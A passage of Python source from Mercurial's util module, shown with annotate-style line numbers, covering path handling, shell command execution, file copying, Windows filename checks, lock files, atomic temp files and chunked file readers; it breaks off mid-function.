            # only re-enable if the caller had it enabled
            if wasenabled:
                gc.enable()
    return wrapper
1636 1636
# disabling the collector is counterproductive on PyPy, so make nogc a
# no-op there
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x
1640 1640
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        # no starting point: n2 relative to root is already the answer
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives (Windows): no relative path exists, so
            # anchor n2 at root instead
            return os.path.join(root, localpath(n2))
        # make n2 absolute too so both sides are comparable
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # strip the common leading components of both paths
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # climb out of what remains of n1, then descend into n2
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1666 1666
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    # any one of these markers indicates a frozen build
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze
1676 1676
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

# cache for hgexecutable(); None means "not resolved yet"
_hgexecutable = None
1687 1687
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    # resolution order: $HG, frozen executable, a running script named
    # 'hg', then the search path / argv[0]; the result is cached in the
    # module-level _hgexecutable
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[r'__main__']
        if hg:
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1711 1711
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    # stored module-globally; read back by hgexecutable()
    global _hgexecutable
    _hgexecutable = path
1716 1716
1717 1717 def _testfileno(f, stdf):
1718 1718 fileno = getattr(f, 'fileno', None)
1719 1719 try:
1720 1720 return fileno and fileno() == stdf.fileno()
1721 1721 except io.UnsupportedOperation:
1722 1722 return False # fileno() raised UnsupportedOperation
1723 1723
def isstdin(f):
    """return whether ``f`` shares a descriptor with the original stdin"""
    return _testfileno(f, sys.__stdin__)
1726 1726
def isstdout(f):
    """return whether ``f`` shares a descriptor with the original stdout"""
    return _testfileno(f, sys.__stdout__)
1729 1729
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        # None/False -> '0', True -> '1', everything else stringified
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return pycompat.bytestr(val)

    env = dict(encoding.environ)
    if environ:
        for name, value in environ.iteritems():
            env[name] = py2shell(value)
    # always advertise the hg executable to child processes
    env['HG'] = hgexecutable()
    return env
1744 1744
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    # flush our buffered output first so it appears before the child's
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or isstdout(out):
        # child writes straight to our stdout; nothing to copy
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # merge the child's stderr into stdout and copy it into 'out'
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        # OpenVMS reports success with the low status bit set
        rc = 0
    return rc
1771 1771
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # a traceback of depth one means the TypeError came from the
            # call itself (bad arguments), not from inside func
            frames = traceback.extract_tb(sys.exc_info()[2])
            if len(frames) == 1:
                raise error.SignatureError
            raise

    return check
1783 1783
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1799 1799
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember the old stat so the new mtime can be disambiguated
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        # recreate the symlink rather than copying its target
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1852 1852
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # only attempt hardlinks when src and dst share a device
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # offset child progress by the files copied so far;
                # 'num' is read late (closure), which is intentional
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # once a hardlink fails, stop trying for the rest of the tree
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    # a final None position closes out the progress topic
    progress(topic, None)

    return hardlink, num
1892 1892
# Windows device names that cannot be used as the base of a file name,
# in any case combination (checkwinfilename compares lowercased bases)
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
# characters that may not appear anywhere in a Windows file name
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    # treat backslash and slash alike and check every path component
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            # control characters (0-31) are invalid in Windows names
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(c)
        # device names are reserved regardless of any extension
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        # note: both 'in' tests here are substring tests; "n not in '..'"
        # deliberately lets the special components '.' and '..' through
        # while rejecting any other name ending in '.' or ' '
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
1945 1945
# pick the platform-appropriate filename check and timer function
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

# prefer perf_counter where available (Python >= 3.3); it overrides the
# platform-specific choices above
if safehasattr(time, "perf_counter"):
    timer = time.perf_counter
1955 1955
def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        # preferred scheme: store 'info' as the target of a symlink
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            # the lock is already held; report that to the caller
            raise
        # any other symlink failure (e.g. filesystem without symlink
        # support) falls through to the O_EXCL file scheme below
    except AttributeError: # no symlink in os
        pass

    # fallback: exclusive creation of a regular file holding 'info'
    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)
1974 1974
def readlock(pathname):
    """Read the holder info from a lock file created by makelock()."""
    try:
        # symlink-style lock: the info is the link target
        return os.readlink(pathname)
    except OSError as why:
        # EINVAL: not a symlink (regular-file lock); ENOSYS: readlink
        # unsupported — in both cases fall back to reading the file
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname, 'rb')
    r = fp.read()
    fp.close()
    return r
1987 1987
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    # prefer fstat on the open descriptor; fall back to stat-by-name for
    # file-like objects that only expose a .name attribute
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)
1994 1994
1995 1995 # File system features
1996 1996
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    origstat = os.lstat(path)
    dirname, base = os.path.split(path)
    # build a differently-cased spelling of the final component
    folded = base.upper()
    if folded == base:
        folded = base.lower()
    if folded == base:
        return True # no evidence against case sensitivity
    try:
        otherstat = os.lstat(os.path.join(dirname, folded))
    except OSError:
        # the folded spelling doesn't resolve: names are distinct
        return True
    # identical stat means both spellings hit the same file (insensitive)
    return otherstat != origstat
2019 2019
2020 2020 try:
2021 2021 import re2
2022 2022 _re2 = None
2023 2023 except ImportError:
2024 2024 _re2 = False
2025 2025
class _re(object):
    # facade over the 're' module that transparently uses google-re2 when
    # it is installed and actually works

    def _checkre2(self):
        # lazily resolve the module-level _re2 flag:
        # None = unknown, False = re2 unusable, True = re2 available
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes no flags argument, so emulate the two supported
            # flags with inline modifiers
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern not supported by re2; fall back to stdlib re
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape
2068 2068
# shared instance; the re2 availability check happens lazily on first use
re = _re()
2070 2070
# per-directory cache of {normcased name: on-disk name} mappings
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map normcased entry -> on-disk spelling for one directory
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # str.replace returns a new string, so the result must be assigned;
    # otherwise a '\' separator is mis-parsed as an escape inside the
    # character classes below and backslashes are never matched as
    # separators.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separator runs are passed through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        # fall back to the caller's spelling if the entry vanished
        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
2113 2113
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        # create a scratch file next to testfile and hardlink it
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        # with working link counts, the linked pair must report > 1
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        # best-effort cleanup of the scratch files
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
2142 2142
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    # osaltsep may be falsy (no alternate separator on this platform)
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2147 2147
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    # returns the raw list of components, including empty strings for
    # leading/doubled separators (plain str.split semantics)
    return path.split(pycompat.ossep)
2155 2155
def gui():
    '''Are we running in a GUI?'''
    if pycompat.isdarwin:
        if 'SSH_CONNECTION' in encoding.environ:
            # handle SSH access to a box where the user is logged in
            return False
        elif getattr(osutil, 'isgui', None):
            # check if a CoreGraphics session is available
            return osutil.isgui()
        else:
            # pure build; use a safe default
            return True
    else:
        # Windows always has a GUI; elsewhere DISPLAY indicates an X session
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
2170 2170
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    # place the temp file next to the original so a later rename stays on
    # the same filesystem
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # original doesn't exist: the empty temp file will do
                return temp
            if not getattr(inst, 'filename', None):
                # attach the filename for a more useful error message
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # don't leave a half-written temp file behind on failure
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
2211 2211
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        # os.stat() result for the tracked path, or None if it didn't exist
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat for ``path``; a missing file yields stat=None."""
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an open file object."""
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            # at least one side has stat = None (file didn't exist)
            pass
        try:
            # two missing files compare equal
            return self.stat is None and old.stat is None
        except AttributeError:
            # 'old' has no 'stat' attribute at all: not comparable
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            # either side has stat = None: nothing to be ambiguous about
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # bump mtime by one second; the mask presumably keeps the value in
        # signed-32-bit range — TODO confirm which platforms require it
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        # delegate to __eq__ so both comparisons stay consistent
        return not self == other
2313 2313
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        # temp copy in the same directory; a 'w' mode skips copying contents
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        """Rename the temp copy over the permanent name (commit)."""
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        """Drop all writes: remove the temp copy without renaming."""
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on success, discard on exception
        if exctype is not None:
            self.discard()
        else:
            self.close()
2376 2376
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    # try removing directories that might now be empty; removedirs climbs
    # upward until it hits a non-empty parent
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
2388 2388
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        # anything other than "file missing" (e.g. EACCES) is a real failure
        if e.errno != errno.ENOENT:
            raise
2396 2396
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            # already there: nothing to do
            return
        if err.errno != errno.ENOENT or not name:
            raise
        # missing parent: create it recursively, then retry
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root; give up
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
2424 2424
def readfile(path):
    """Return the entire binary content of the file at ``path``."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
2428 2428
def writefile(path, text):
    """Replace the content of the file at ``path`` with ``text`` (bytes)."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
2432 2432
def appendfile(path, text):
    """Append ``text`` (bytes) to the file at ``path``, creating it if
    necessary."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
2436 2436
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # Re-chunk anything larger than 1 MiB into 256 KiB pieces so
            # no oversized string sits in the queue.
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        # number of bytes of self._queue[0] already handed out by read()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                # pull in roughly 256 KiB at a time
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    # source exhausted; return what we have
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                # left goes negative here, which terminates the loop.
                left -= chunkremaining

        return ''.join(buf)
2516 2516
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # when nbytes is 0 the 'and' short-circuits and we stop without
        # issuing a read
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s
2537 2537
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Wraps a source file object and serves at most ``limit`` bytes from
    it; attempts to read past the cap behave like EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        # cap already exhausted: behave like EOF
        if not self._left:
            return b''

        # a negative n means "read everything remaining under the cap"
        wanted = self._left if n < 0 else n
        data = self._fh.read(min(wanted, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        """Fill buffer ``b`` from the capped stream; returns bytes stored."""
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)
2574
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        flags = 0 if casesensitive else remod.I
        try:
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search

    if pattern.startswith('literal:'):
